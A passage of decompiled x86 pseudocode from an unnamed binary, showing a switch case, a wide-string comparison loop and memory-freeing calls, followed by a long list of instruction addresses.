																			__eax =  *__ebx;
																			__edx =  *__eax;
																			__ecx = _v196;
																			__eax =  *(__eax + 4);
																			__esp = __esp + 4;
																			__edx =  *(_v196 + 4);
																			__eax = E00AA0D80(__eax,  *(_v196 + 4),  *(_v196 + 4));
																		}
																		goto L48;
																	case 0xa:
																		_push(0x14);
																		__eax = E00AA14F7(__edi, __esi, __eflags);
																		__esp = __esp + 4;
																		__eflags = __eax;
																		if(__eax == 0) {
																			L343:
																			__eax = 0;
																			 *__ebx = 0;
																			goto L48;
																		}
																		__ecx = _v196;
																		 *__ebx = __eax;
																		goto L48;
																}
															}
															L47:
															 *_t1414 = _v196;
															goto L48;
														}
													}
													goto L57;
												}
											}
											__eflags = _t978 - _t1444;
											if(_t978 <= _t1444) {
												goto L296;
											} else {
												_t1379 = (_t978 << 4) +  *0xb3912c;
												__eflags = _t1379;
												_v148 = _t1379;
												goto L28;
											}
										}
									}
								}
								_t1593 = _v200 + 1;
								__eflags = _t1593;
								_v136 = _t1593;
								goto L287;
							}
							_v116 = _v200 - 1;
							L287:
							__eflags = _v136 - _v116;
						} while (_v136 <= _v116);
						goto L288;
					}
					_t1763 =  *(_t956 + 0x134);
					if(_t1763 != 0) {
						_v200 = _t1763;
						do {
							_t1725 =  *((intOrPtr*)(_t1763 + 4));
							if(_t1725 != _v176) {
								goto L268;
							}
							if(_t1725 == 0) {
								L15:
								_t1382 = _v168;
								 *_t1382 =  *_t1382 - 1;
								if( *_t1382 == 0) {
									_push(_v180);
									E00AA10FC();
									_push(_v168);
									E00AA10FC();
									_t1809 = _t1809 + 8;
								}
								goto L17;
							} else {
								_t1595 = _v180;
								_t1385 =  *_t1763;
								L12:
								L12:
								if( *_t1385 !=  *_t1595) {
									_t1763 = _v200;
								} else {
									goto L13;
								}
								goto L268;
								L13:
								_t1385 = _t1385 + 2;
								_t1595 =  &(_t1595[1]);
								_t1725 = _t1725 - 1;
								if(_t1725 != 0) {
									goto L12;
								} else {
									_t1763 = _v200;
									goto L15;
								}
							}
							L268:
							_t1763 =  *(_t1763 + 0x20);
							_v200 = _t1763;
							__eflags = _t1763;
						} while (__eflags != 0);
					}
					goto L288;
				}
			}

































































































































































































































































































                            0x00a998f0
                            0x00a998fd
                            0x00a99905
                            0x00a9990e
                            0x00a99911
                            0x00a99916
                            0x00a99919
                            0x00a9991d
                            0x00a9991e
                            0x00ab970e
                            0x00a99924
                            0x00a9992e
                            0x00a9992e
                            0x00a9992e
                            0x00a99932
                            0x00a99944
                            0x00a99958
                            0x00a9995c
                            0x00a99964
                            0x00a99966
                            0x00a9996b
                            0x00a99970
                            0x00ab9718
                            0x00a99976
                            0x00a99976
                            0x00a99976
                            0x00a99986
                            0x00a9998a
                            0x00ab97ee
                            0x00ab97f2
                            0x00000000
                            0x00a99990
                            0x00a99993
                            0x00ab9723
                            0x00ab9729
                            0x00ab9734
                            0x00ab9747
                            0x00ab974f
                            0x00ab9759
                            0x00ab9769
                            0x00ab976e
                            0x00ab9771
                            0x00ab9771
                            0x00a999a3
                            0x00a999a9
                            0x00a999ac
                            0x00a999b4
                            0x00ab978c
                            0x00ab978c
                            0x00ab978d
                            0x00000000
                            0x00000000
                            0x00ab9793
                            0x00ab979b
                            0x00ab979f
                            0x00ab97aa
                            0x00ab97b2
                            0x00ab97bf
                            0x00ab97c1
                            0x00ab97d5
                            0x00ab980f
                            0x00ab9813
                            0x00000000
                            0x00000000
                            0x00ab9819
                            0x00ab9820
                            0x00a99a2b
                            0x00a99a2b
                            0x00a99a2f
                            0x00ab97f7
                            0x00ab9801
                            0x00a9a8af
                            0x00a9a8b5
                            0x00a9a8b5
                            0x00a99a3b
                            0x00a99a42
                            0x00a99a44
                            0x00a99a48
                            0x00a99a55
                            0x00a99a62
                            0x00a99a63
                            0x00a99a68
                            0x00a99a71
                            0x00a99a75
                            0x00a99a7d
                            0x00a99a89
                            0x00a99a91
                            0x00a99a95
                            0x00a99a99
                            0x00a99a9d
                            0x00a99aa5
                            0x00a99aa9
                            0x00a99aad
                            0x00a99ab1
                            0x00ab977a
                            0x00ab977e
                            0x00ab9780
                            0x00abae08
                            0x00abae08
                            0x00000000
                            0x00a99ab7
                            0x00a99ab7
                            0x00a99ab8
                            0x00a99abc
                            0x00a99abe
                            0x00a99ac2
                            0x00a99ac4
                            0x00a99ac8
                            0x00a99ac8
                            0x00a99ad0
                            0x00a99ad7
                            0x00a99ad7
                            0x00a99ad9
                            0x00a99ad9
                            0x00a99ac8
                            0x00a99ac8
                            0x00a99ad0
                            0x00a99ad7
                            0x00a99ad7
                            0x00000000
                            0x00a99ad7
                            0x00000000
                            0x00a99adc
                            0x00a99adc
                            0x00a99adc
                            0x00a99adf
                            0x00ab9853
                            0x00000000
                            0x00ab9853
                            0x00a99ae5
                            0x00a99ae5
                            0x00a99ae6
                            0x00ab982a
                            0x00ab982d
                            0x00000000
                            0x00000000
                            0x00ab9843
                            0x00ab9844
                            0x00ab9846
                            0x00000000
                            0x00ab9846
                            0x00a99aec
                            0x00a99aee
                            0x00ab984c
                            0x00ab984d
                            0x00000000
                            0x00ab984d
                            0x00a99af4
                            0x00a99af9
                            0x00a99afb
                            0x00a99b02
                            0x00a99b08
                            0x00ab9859
                            0x00ab9859
                            0x00a99b23
                            0x00a99b23
                            0x00a99b27
                            0x00a99b2b
                            0x00a99cf2
                            0x00a99cf2
                            0x00a99cf6
                            0x00a99cfa
                            0x00abadfd
                            0x00abae01
                            0x00abae02
                            0x00000000
                            0x00abae02
                            0x00a99d00
                            0x00a99d04
                            0x00000000
                            0x00000000
                            0x00a99d0a
                            0x00a99d0e
                            0x00000000
                            0x00000000
                            0x00a99d14
                            0x00a99d1b
                            0x00a99d1f
                            0x00a99d27
                            0x00a99d2b
                            0x00a99d2f
                            0x00a99d33
                            0x00a99d35
                            0x00ab9c78
                            0x00ab9c78
                            0x00a99d3b
                            0x00a99d41
                            0x00ab9c81
                            0x00ab9c87
                            0x00ab9c8d
                            0x00ab9c93
                            0x00ab9c96
                            0x00a99d47
                            0x00a99d47
                            0x00a99d49
                            0x00a99d4e
                            0x00a99d51
                            0x00a99d53
                            0x00ab9d24
                            0x00a99d59
                            0x00a99d59
                            0x00a99d5b
                            0x00a99d5d
                            0x00a99d61
                            0x00a99d64
                            0x00a99d68
                            0x00ab9ca2
                            0x00ab9ca2
                            0x00a99d6e
                            0x00a99d72
                            0x00a99d74
                            0x00ab9caa
                            0x00ab9cac
                            0x00ab9cb0
                            0x00ab9cb5
                            0x00ab9cb8
                            0x00ab9cba
                            0x00ab9ccb
                            0x00ab9ccb
                            0x00ab9cc0
                            0x00ab9cc1
                            0x00ab9cc1
                            0x00ab9cd4
                            0x00ab9cd6
                            0x00ab9cdd
                            0x00ab9ce4
                            0x00ab9cec
                            0x00ab9cf3
                            0x00ab9cf8
                            0x00ab9d07
                            0x00ab9d0c
                            0x00ab9d18
                            0x00ab9d1d
                            0x00a99d7a
                            0x00a99d7a
                            0x00a99d7a
                            0x00a99d74
                            0x00a99d7c
                            0x00a99d82
                            0x00a99d85
                            0x00a99d85
                            0x00a99d8b
                            0x00a99d8f
                            0x00a99d95
                            0x00a99d97
                            0x00ab9d2b
                            0x00ab9d2d
                            0x00ab9d30
                            0x00ab9d32
                            0x00ab9d3d
                            0x00ab9d3d
                            0x00ab9d42
                            0x00ab9d45
                            0x00ab9d47
                            0x00ab9d52
                            0x00ab9d52
                            0x00ab9d57
                            0x00ab9d5b
                            0x00ab9d61
                            0x00ab9d64
                            0x00ab9d66
                            0x00ab9d6e
                            0x00ab9d6e
                            0x00ab9d66
                            0x00ab9d74
                            0x00ab9d74
                            0x00a99da2
                            0x00a99da6
                            0x00a9a229
                            0x00a9a229
                            0x00a9a235
                            0x00a9a23c
                            0x00a9a243
                            0x00a9a24a
                            0x00a9a251
                            0x00a9a258
                            0x00a9a25f
                            0x00a9a266
                            0x00a9a26f
                            0x00a9a275
                            0x00a9a27c
                            0x00a9a283
                            0x00a9a286
                            0x00a9a28b
                            0x00a9a28f
                            0x00aba3ae
                            0x00aba3b3
                            0x00a9a295
                            0x00a9a295
                            0x00a9a297
                            0x00a9a29c
                            0x00a9a29f
                            0x00a9a2a1
                            0x00aba3f4
                            0x00a9a2a7
                            0x00a9a2a7
                            0x00a9a2ae
                            0x00a9a2b1
                            0x00a9a2b4
                            0x00a9a2b6
                            0x00a9a2b9
                            0x00a9a2bc
                            0x00a9a2bf
                            0x00a9a2c2
                            0x00a9a2c5
                            0x00a9a2c8
                            0x00a9a2c8
                            0x00a9a2ce
                            0x00a9a2d1
                            0x00a9a2d1
                            0x00a9a2d4
                            0x00a9a2df
                            0x00a9a2e5
                            0x00a9a2ec
                            0x00a9a2ee
                            0x00a9a2f2
                            0x00a9a2f7
                            0x00a9a2f9
                            0x00aba3fb
                            0x00aba3fb
                            0x00aba400
                            0x00aba400
                            0x00000000
                            0x00a9a2ff
                            0x00a9a2ff
                            0x00a9a303
                            0x00a9a307
                            0x00a9a30d
                            0x00a9a310
                            0x00a9a315
                            0x00a9a319
                            0x00a9a31c
                            0x00aba409
                            0x00aba409
                            0x00a9a322
                            0x00a9a326
                            0x00aba631
                            0x00aba634
                            0x00aba637
                            0x00aba63c
                            0x00aba643
                            0x00000000
                            0x00a9a32c
                            0x00a9a32f
                            0x00a9a334
                            0x00a9a337
                            0x00a9a33c
                            0x00a9a340
                            0x00aba414
                            0x00a9a346
                            0x00a9a346
                            0x00a9a346
                            0x00a9a349
                            0x00a9a34c
                            0x00a9a34e
                            0x00a9a3db
                            0x00a9a3db
                            0x00a9a3dd
                            0x00a9a3e0
                            0x00a9a3e5
                            0x00a9a3e9
                            0x00a9a3ed
                            0x00aba626
                            0x00aba626
                            0x00a9a3f3
                            0x00a9a3f7
                            0x00aba650
                            0x00aba655
                            0x00aba658
                            0x00aba658
                            0x00a9a3fd
                            0x00a9a401
                            0x00aba667
                            0x00a9a407
                            0x00a9a407
                            0x00a9a407
                            0x00a9a40a
                            0x00a9a40e
                            0x00aba681
                            0x00aba681
                            0x00a9a414
                            0x00a9a419
                            0x00a9a41c
                            0x00a9a421
                            0x00a9a425
                            0x00aba68b
                            0x00aba68e
                            0x00aba691
                            0x00aba693
                            0x00aba69a
                            0x00aba69a
                            0x00aba69f
                            0x00aba6a2
                            0x00aba6a2
                            0x00a9a42b
                            0x00a9a42f
                            0x00aba6ab
                            0x00000000
                            0x00a9a435
                            0x00a9a435
                            0x00a9a43b
                            0x00a9a43f
                            0x00a9a441
                            0x00a9a501
                            0x00a9a505
                            0x00a9a508
                            0x00a9a50c
                            0x00a9a50c
                            0x00a9a510
                            0x00a9a513
                            0x00a9a517
                            0x00a9a519
                            0x00a9a51d
                            0x00aba7d3
                            0x00aba7d3
                            0x00a9a52a
                            0x00a9a52d
                            0x00a9a531
                            0x00a9a534
                            0x00aba7db
                            0x00aba7db
                            0x00a9a53a
                            0x00a9a543
                            0x00a9a545
                            0x00a9a549
                            0x00a9a54d
                            0x00aba7e6
                            0x00a9a553
                            0x00a9a553
                            0x00a9a553
                            0x00a9a556
                            0x00a9a556
                            0x00a9a560
                            0x00a9a562
                            0x00a9a5c1
                            0x00a9a5c1
                            0x00000000
                            0x00a9a564
                            0x00a9a564
                            0x00a9a567
                            0x00a9a569
                            0x00aba7ef
                            0x00aba7f4
                            0x00aba7f4
                            0x00a9a56f
                            0x00a9a572
                            0x00a9a575
                            0x00aba800
                            0x00aba802
                            0x00aba804
                            0x00000000
                            0x00000000
                            0x00aba80b
                            0x00aba813
                            0x00aba814
                            0x00aba819
                            0x00000000
                            0x00a9a57b
                            0x00a9a57b
                            0x00a9a57b
                            0x00a9a57e
                            0x00aba821
                            0x00aba823
                            0x00aba825
                            0x00aba82c
                            0x00aba82c
                            0x00a9a584
                            0x00a9a584
                            0x00a9a587
                            0x00aba838
                            0x00a9a58d
                            0x00a9a58d
                            0x00a9a590
                            0x00aba847
                            0x00aba848
                            0x00aba852
                            0x00aba853
                            0x00aba858
                            0x00a9a596
                            0x00a9a596
                            0x00a9a599
                            0x00aba860
                            0x00aba862
                            0x00aba864
                            0x00aba86b
                            0x00aba86b
                            0x00aba864
                            0x00a9a599
                            0x00a9a590
                            0x00a9a587
                            0x00a9a59f
                            0x00a9a59f
                            0x00a9a5a6
                            0x00a9a5ac
                            0x00a9a5af
                            0x00a9a5b2
                            0x00aba875
                            0x00aba876
                            0x00aba879
                            0x00000000
                            0x00000000
                            0x00aba87f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00aba894
                            0x00aba896
                            0x00000000
                            0x00000000
                            0x00aba89e
                            0x00aba8a5
                            0x00000000
                            0x00000000
                            0x00aba8ac
                            0x00aba8ae
                            0x00aba8b3
                            0x00aba8b6
                            0x00aba8b8
                            0x00aba8e5
                            0x00aba8e7
                            0x00aba8be
                            0x00aba8be
                            0x00aba8c5
                            0x00aba8c7
                            0x00aba8c9
                            0x00aba8cc
                            0x00aba8cf
                            0x00aba8d2
                            0x00aba8d5
                            0x00aba8d8
                            0x00aba8db
                            0x00aba8dd
                            0x00aba8dd
                            0x00000000
                            0x00000000
                            0x00aba8fd
                            0x00aba902
                            0x00aba907
                            0x00aba90a
                            0x00aba90c
                            0x00aba927
                            0x00aba927
                            0x00aba912
                            0x00aba912
                            0x00aba919
                            0x00aba91e
                            0x00aba920
                            0x00aba920
                            0x00aba920
                            0x00aba920
                            0x00aba929
                            0x00aba92d
                            0x00aba92f
                            0x00aba933
                            0x00aba939
                            0x00aba93c
                            0x00aba93c
                            0x00a9a5c5
                            0x00a9a5c5
                            0x00a9a5c9
                            0x00a9a5cd
                            0x00abaa5b
                            0x00a9a5d3
                            0x00a9a5d3
                            0x00a9a5d3
                            0x00a9a5d6
                            0x00a9a5da
                            0x00a9a5e1
                            0x00abaa63
                            0x00abaa68
                            0x00abaa6c
                            0x00abaa71
                            0x00abaa73
                            0x00abaa79
                            0x00a9a5e7
                            0x00a9a5e7
                            0x00a9a5e7
                            0x00a9a5ed
                            0x00a9a5f4
                            0x00abaa85
                            0x00abaa89
                            0x00000000
                            0x00a9a5fa
                            0x00a9a5fa
                            0x00a9a5ff
                            0x00a9a603
                            0x00a9a607
                            0x00a9a609
                            0x00a9a6d5
                            0x00a9a6d9
                            0x00a9a6dd
                            0x00a9a6de
                            0x00a9a6e7
                            0x00a9a6ea
                            0x00a9a6f0
                            0x00a9a6f7
                            0x00a9a6fe
                            0x00a9a707
                            0x00a9a70d
                            0x00a9a714
                            0x00a9a716
                            0x00abab34
                            0x00abab39
                            0x00abab39
                            0x00a9a71c
                            0x00a9a723
                            0x00a9a726
                            0x00abab49
                            0x00abab50
                            0x00abab52
                            0x00abab58
                            0x00abab59
                            0x00abab5f
                            0x00abab60
                            0x00abab65
                            0x00abab65
                            0x00a9a72c
                            0x00a9a72c
                            0x00a9a72f
                            0x00abab6d
                            0x00abab74
                            0x00abab76
                            0x00abab7d
                            0x00abab7d
                            0x00a9a735
                            0x00a9a735
                            0x00a9a738
                            0x00abab8e
                            0x00a9a73e
                            0x00a9a73e
                            0x00a9a741
                            0x00abab98
                            0x00ababa2
                            0x00ababa3
                            0x00ababab
                            0x00ababac
                            0x00ababb1
                            0x00a9a747
                            0x00a9a747
                            0x00a9a74a
                            0x00ababb9
                            0x00ababc0
                            0x00ababc2
                            0x00ababc9
                            0x00ababc9
                            0x00ababc2
                            0x00a9a74a
                            0x00a9a741
                            0x00a9a738
                            0x00a9a72f
                            0x00a9a750
                            0x00a9a757
                            0x00a9a75e
                            0x00a9a765
                            0x00a9a76c
                            0x00a9a773
                            0x00a9a775
                            0x00ababd4
                            0x00ababd9
                            0x00ababe4
                            0x00ababe9
                            0x00ababe9
                            0x00a9a77b
                            0x00a9a77e
                            0x00ababf0
                            0x00ababf7
                            0x00ababfd
                            0x00abac04
                            0x00abac05
                            0x00abac0b
                            0x00abac0c
                            0x00abac11
                            0x00abac14
                            0x00abac19
                            0x00abac19
                            0x00a9a784
                            0x00a9a784
                            0x00a9a787
                            0x00abac20
                            0x00abac27
                            0x00abac35
                            0x00abac3a
                            0x00abac3f
                            0x00abac3f
                            0x00a9a78d
                            0x00a9a78d
                            0x00a9a790
                            0x00abac4d
                            0x00abac52
                            0x00abac57
                            0x00a9a796
                            0x00a9a796
                            0x00a9a799
                            0x00abac5e
                            0x00abac68
                            0x00abac69
                            0x00abac71
                            0x00abac72
                            0x00abac77
                            0x00abac7a
                            0x00abac7f
                            0x00a9a79f
                            0x00a9a79f
                            0x00a9a7a2
                            0x00abac86
                            0x00abac8d
                            0x00abac9b
                            0x00abaca0
                            0x00abaca5
                            0x00abaca5
                            0x00abac8d
                            0x00a9a7a2
                            0x00a9a799
                            0x00a9a790
                            0x00a9a787
                            0x00a9a7a8
                            0x00a9a7ac
                            0x00a9a7ae
                            0x00abacad
                            0x00abacb2
                            0x00abacba
                            0x00abacbf
                            0x00abacbf
                            0x00a9a7b4
                            0x00a9a7b8
                            0x00a9a7bb
                            0x00abacc6
                            0x00abacca
                            0x00abaccc
                            0x00abacd2
                            0x00abacd3
                            0x00abacdd
                            0x00abacde
                            0x00abace3
                            0x00abace6
                            0x00abaceb
                            0x00abaceb
                            0x00a9a7c1
                            0x00a9a7c1
                            0x00a9a7c4
                            0x00abacf2
                            0x00abacf6
                            0x00abacf8
                            0x00abacff
                            0x00abad04
                            0x00abad09
                            0x00abad09
                            0x00a9a7ca
                            0x00a9a7ca
                            0x00a9a7cd
                            0x00abad14
                            0x00abad19
                            0x00abad1e
                            0x00a9a7d3
                            0x00a9a7d3
                            0x00a9a7d6
                            0x00abad2c
                            0x00abad2d
                            0x00abad39
                            0x00abad3a
                            0x00abad3f
                            0x00abad42
                            0x00abad47
                            0x00a9a7dc
                            0x00a9a7dc
                            0x00a9a7df
                            0x00abad4e
                            0x00abad52
                            0x00abad54
                            0x00abad5b
                            0x00abad60
                            0x00abad65
                            0x00abad65
                            0x00abad54
                            0x00a9a7df
                            0x00a9a7d6
                            0x00a9a7cd
                            0x00a9a7c4
                            0x00a9a7e5
                            0x00a9a7e9
                            0x00a9a7ed
                            0x00a9a7ef
                            0x00a9a804
                            0x00a9a808
                            0x00a9a809
                            0x00a9a80e
                            0x00a9a811
                            0x00a9a816
                            0x00a9a8a0
                            0x00a9a8a4
                            0x00a9a8a5
                            0x00a9a8ad
                            0x00a9a8ad
                            0x00000000
                            0x00a9a81c
                            0x00a9a81c
                            0x00a9a81c
                            0x00a9a820
                            0x00a9a824
                            0x00a9a827
                            0x00a9a829
                            0x00000000
                            0x00000000
                            0x00a9a82b
                            0x00a9a82e
                            0x00a9a830
                            0x00a9a835
                            0x00a9a83a
                            0x00a9a83d
                            0x00abad6e
                            0x00abad6f
                            0x00abad7a
                            0x00abad7b
                            0x00abad80
                            0x00abad80
                            0x00a9a843
                            0x00a9a844
                            0x00a9a849
                            0x00a9a84c
                            0x00a9a84c
                            0x00a9a853
                            0x00a9a856
                            0x00a9a859
                            0x00abad88
                            0x00abad8a
                            0x00abad8c
                            0x00000000
                            0x00000000
                            0x00abad92
                            0x00abad93
                            0x00abad9b
                            0x00abad9c
                            0x00abada1
                            0x00000000
                            0x00a9a85f
                            0x00a9a85f
                            0x00a9a85f
                            0x00a9a862
                            0x00abada9
                            0x00abadab
                            0x00abadad
                            0x00abadb4
                            0x00abadb4
                            0x00a9a868
                            0x00a9a868
                            0x00a9a86b
                            0x00abadc0
                            0x00a9a871
                            0x00a9a871
                            0x00a9a874
                            0x00abadcf
                            0x00abadd0
                            0x00abadda
                            0x00abaddb
                            0x00abade0
                            0x00a9a87a
                            0x00a9a87a
                            0x00a9a87d
                            0x00abade8
                            0x00abadea
                            0x00abadec
                            0x00abadf3
                            0x00abadf3
                            0x00abadec
                            0x00a9a87d
                            0x00a9a874
                            0x00a9a86b
                            0x00a9a883
                            0x00a9a883
                            0x00a9a884
                            0x00a9a88b
                            0x00a9a891
                            0x00a9a896
                            0x00a9a896
                            0x00a9a899
                            0x00a9a899
                            0x00a9a89a
                            0x00a9a89a
                            0x00000000
                            0x00a9a820
                            0x00a9a7f1
                            0x00a9a7f1
                            0x00a9a7f1
                            0x00a9a7f3
                            0x00a9a7f6
                            0x00a9a7f7
                            0x00a9a7fc
                            0x00a9a7fd
                            0x00a9a800
                            0x00a9a800
                            0x00000000
                            0x00a9a7f3
                            0x00a9a60f
                            0x00a9a60f
                            0x00a9a612
                            0x00a9a614
                            0x00a9a616
                            0x00a9a619
                            0x00a9a619
                            0x00a9a61e
                            0x00a9a621
                            0x00a9a623
                            0x00abaa98
                            0x00abaa98
                            0x00a9a629
                            0x00a9a62d
                            0x00a9a6a4
                            0x00a9a6a7
                            0x00a9a6ac
                            0x00a9a6af
                            0x00a9a6b3
                            0x00a9a6b4
                            0x00a9a6bf
                            0x00a9a6c0
                            0x00a9a6c5
                            0x00a9a6c5
                            0x00a9a6c8
                            0x00a9a6c9
                            0x00a9a6ce
                            0x00a9a6d2
                            0x00000000
                            0x00a9a62f
                            0x00a9a62f
                            0x00a9a632
                            0x00a9a634
                            0x00000000
                            0x00000000
                            0x00a9a636
                            0x00a9a639
                            0x00a9a63b
                            0x00a9a640
                            0x00a9a645
                            0x00a9a648
                            0x00abaaa4
                            0x00abaaa5
                            0x00abaab0
                            0x00abaab1
                            0x00abaab6
                            0x00abaab6
                            0x00a9a64e
                            0x00a9a64f
                            0x00a9a654
                            0x00a9a657
                            0x00a9a657
                            0x00a9a65e
                            0x00a9a661
                            0x00a9a664
                            0x00abaabe
                            0x00abaac0
                            0x00abaac2
                            0x00000000
                            0x00000000
                            0x00abaac8
                            0x00abaac9
                            0x00abaad1
                            0x00abaad2
                            0x00abaad7
                            0x00000000
                            0x00a9a66a
                            0x00a9a66a
                            0x00a9a66a
                            0x00a9a66d
                            0x00abaadf
                            0x00abaae1
                            0x00abaae3
                            0x00abaaea
                            0x00abaaea
                            0x00a9a673
                            0x00a9a673
                            0x00a9a676
                            0x00abaaf6
                            0x00a9a67c
                            0x00a9a67c
                            0x00a9a67f
                            0x00abab05
                            0x00abab06
                            0x00abab10
                            0x00abab11
                            0x00abab16
                            0x00a9a685
                            0x00a9a685
                            0x00a9a688
                            0x00abab1e
                            0x00abab20
                            0x00abab22
                            0x00abab29
                            0x00abab29
                            0x00abab22
                            0x00a9a688
                            0x00a9a67f
                            0x00a9a676
                            0x00a9a68e
                            0x00a9a68e
                            0x00a9a68f
                            0x00a9a696
                            0x00a9a69c
                            0x00a9a6a1
                            0x00000000
                            0x00a9a6a1
                            0x00a9a664
                            0x00a9a62d
                            0x00a9a609
                            0x00000000
                            0x00aba8ef
                            0x00aba8f6
                            0x00000000
                            0x00000000
                            0x00aba943
                            0x00aba94a
                            0x00aba94c
                            0x00aba952
                            0x00aba954
                            0x00aba959
                            0x00aba95c
                            0x00aba95d
                            0x00aba95f
                            0x00aba965
                            0x00aba967
                            0x00aba968
                            0x00aba969
                            0x00aba96f
                            0x00aba971
                            0x00aba977
                            0x00aba979
                            0x00aba97a
                            0x00aba980
                            0x00aba982
                            0x00aba983
                            0x00aba988
                            0x00aba98b
                            0x00aba98b
                            0x00aba971
                            0x00000000
                            0x00000000
                            0x00aba99d
                            0x00000000
                            0x00000000
                            0x00aba9a4
                            0x00aba9a6
                            0x00aba9ab
                            0x00aba9ae
                            0x00aba9b0
                            0x00000000
                            0x00000000
                            0x00aba9b6
                            0x00aba9bf
                            0x00000000
                            0x00000000
                            0x00aba9d0
                            0x00aba9d2
                            0x00aba9d7
                            0x00aba9de
                            0x00aba9e0
                            0x00aba9e2
                            0x00aba9e4
                            0x00aba9e6
                            0x00aba9e8
                            0x00aba9eb
                            0x00aba9ed
                            0x00abaa1b
                            0x00abaa1d
                            0x00abaa22
                            0x00abaa24
                            0x00abaa27
                            0x00abaa29
                            0x00abaa2c
                            0x00abaa2f
                            0x00aba9f3
                            0x00aba9f3
                            0x00aba9f4
                            0x00aba9f9
                            0x00aba9fb
                            0x00aba9fe
                            0x00abaa00
                            0x00abaa02
                            0x00abaa05
                            0x00abaa08
                            0x00abaa0e
                            0x00abaa13
                            0x00000000
                            0x00000000
                            0x00abaa37
                            0x00abaa39
                            0x00abaa3e
                            0x00abaa41
                            0x00abaa43
                            0x00aba9c9
                            0x00aba9c9
                            0x00a9a5bf
                            0x00a9a5bf
                            0x00000000
                            0x00a9a5bf
                            0x00abaa45
                            0x00abaa4e
                            0x00000000
                            0x00000000
                            0x00aba87f
                            0x00a9a5b8
                            0x00a9a5b8
                            0x00000000
                            0x00a9a5b8
                            0x00a9a575
                            0x00a9a562
                            0x00a9a447
                            0x00a9a44a
                            0x00a9a44c
                            0x00aba6b5
                            0x00aba6ba
                            0x00aba6ba
                            0x00a9a452
                            0x00a9a455
                            0x00a9a458
                            0x00aba6c6
                            0x00aba6c9
                            0x00aba6cb
                            0x00000000
                            0x00000000
                            0x00aba6d2
                            0x00aba6db
                            0x00aba6dc
                            0x00aba6e1
                            0x00000000
                            0x00a9a45e
                            0x00a9a45e
                            0x00a9a45e
                            0x00a9a461
                            0x00aba6e9
                            0x00aba6ec
                            0x00aba6ee
                            0x00aba6f5
                            0x00aba6f5
                            0x00a9a467
                            0x00a9a467
                            0x00a9a46a
                            0x00aba6ff
                            0x00aba702
                            0x00a9a470
                            0x00a9a470
                            0x00a9a473
                            0x00aba712
                            0x00aba713
                            0x00aba71e
                            0x00aba71f
                            0x00aba724
                            0x00a9a479
                            0x00a9a479
                            0x00a9a47c
                            0x00aba72c
                            0x00aba72f
                            0x00aba731
                            0x00aba738
                            0x00aba738
                            0x00aba731
                            0x00a9a47c
                            0x00a9a473
                            0x00a9a46a
                            0x00a9a482
                            0x00a9a482
                            0x00a9a489
                            0x00a9a490
                            0x00a9a493
                            0x00a9a495
                            0x00a9a49a
                            0x00a9a49f
                            0x00a9a4a2
                            0x00aba744
                            0x00aba745
                            0x00aba750
                            0x00aba751
                            0x00aba756
                            0x00aba756
                            0x00a9a4a8
                            0x00a9a4a9
                            0x00a9a4ae
                            0x00a9a4b1
                            0x00a9a4b1
                            0x00a9a4b8
                            0x00a9a4bb
                            0x00a9a4be
                            0x00aba75e
                            0x00aba760
                            0x00aba762
                            0x00000000
                            0x00000000
                            0x00aba769
                            0x00aba771
                            0x00aba772
                            0x00aba777
                            0x00000000
                            0x00a9a4c4
                            0x00a9a4c4
                            0x00a9a4c4
                            0x00a9a4c7
                            0x00aba77f
                            0x00aba781
                            0x00aba783
                            0x00aba78a
                            0x00aba78a
                            0x00a9a4cd
                            0x00a9a4cd
                            0x00a9a4d0
                            0x00aba796
                            0x00a9a4d6
                            0x00a9a4d6
                            0x00a9a4d9
                            0x00aba7a5
                            0x00aba7a6
                            0x00aba7b0
                            0x00aba7b1
                            0x00aba7b6
                            0x00a9a4df
                            0x00a9a4df
                            0x00a9a4e2
                            0x00aba7be
                            0x00aba7c0
                            0x00aba7c2
                            0x00aba7c9
                            0x00aba7c9
                            0x00aba7c2
                            0x00a9a4e2
                            0x00a9a4d9
                            0x00a9a4d0
                            0x00a9a4e8
                            0x00a9a4e8
                            0x00a9a4e9
                            0x00a9a4f0
                            0x00a9a4f6
                            0x00a9a4fb
                            0x00a9a4fe
                            0x00000000
                            0x00a9a4fe
                            0x00a9a4be
                            0x00a9a458
                            0x00a9a354
                            0x00a9a354
                            0x00a9a357
                            0x00a9a359
                            0x00aba41d
                            0x00aba422
                            0x00aba422
                            0x00a9a35f
                            0x00a9a362
                            0x00a9a365
                            0x00aba42e
                            0x00aba430
                            0x00aba432
                            0x00000000
                            0x00000000
                            0x00aba439
                            0x00aba441
                            0x00aba442
                            0x00aba447
                            0x00000000
                            0x00a9a36b
                            0x00a9a36b
                            0x00a9a36b
                            0x00a9a36e
                            0x00aba44f
                            0x00aba451
                            0x00aba453
                            0x00aba45a
                            0x00aba45a
                            0x00a9a374
                            0x00a9a374
                            0x00a9a377
                            0x00aba466
                            0x00a9a37d
                            0x00a9a37d
                            0x00a9a380
                            0x00aba475
                            0x00aba476
                            0x00aba480
                            0x00aba481
                            0x00aba486
                            0x00a9a386
                            0x00a9a386
                            0x00a9a389
                            0x00aba48e
                            0x00aba490
                            0x00aba492
                            0x00aba499
                            0x00aba499
                            0x00aba492
                            0x00a9a389
                            0x00a9a380
                            0x00a9a377
                            0x00a9a38f
                            0x00a9a38f
                            0x00a9a396
                            0x00a9a39c
                            0x00a9a39f
                            0x00a9a3a2
                            0x00a9a3a5
                            0x00aba4a3
                            0x00aba4a4
                            0x00aba4a7
                            0x00000000
                            0x00000000
                            0x00aba4ad
                            0x00000000
                            0x00aba4c3
                            0x00aba4c5
                            0x00000000
                            0x00000000
                            0x00aba4b6
                            0x00aba4bb
                            0x00000000
                            0x00000000
                            0x00aba4cc
                            0x00aba4ce
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00aba4de
                            0x00aba4e3
                            0x00aba4e8
                            0x00aba4eb
                            0x00aba4ed
                            0x00aba503
                            0x00aba503
                            0x00aba4f3
                            0x00aba4f3
                            0x00aba4f5
                            0x00aba4fa
                            0x00aba4fc
                            0x00aba4fc
                            0x00aba4fc
                            0x00aba4fc
                            0x00aba505
                            0x00aba507
                            0x00aba50b
                            0x00aba511
                            0x00aba514
                            0x00aba514
                            0x00aba514
                            0x00000000
                            0x00000000
                            0x00aba4d5
                            0x00aba4d7
                            0x00000000
                            0x00000000
                            0x00aba51e
                            0x00aba521
                            0x00aba516
                            0x00aba516
                            0x00000000
                            0x00aba516
                            0x00aba523
                            0x00aba525
                            0x00aba52a
                            0x00aba52d
                            0x00aba52e
                            0x00aba530
                            0x00aba536
                            0x00aba538
                            0x00aba53a
                            0x00aba53b
                            0x00aba53c
                            0x00aba542
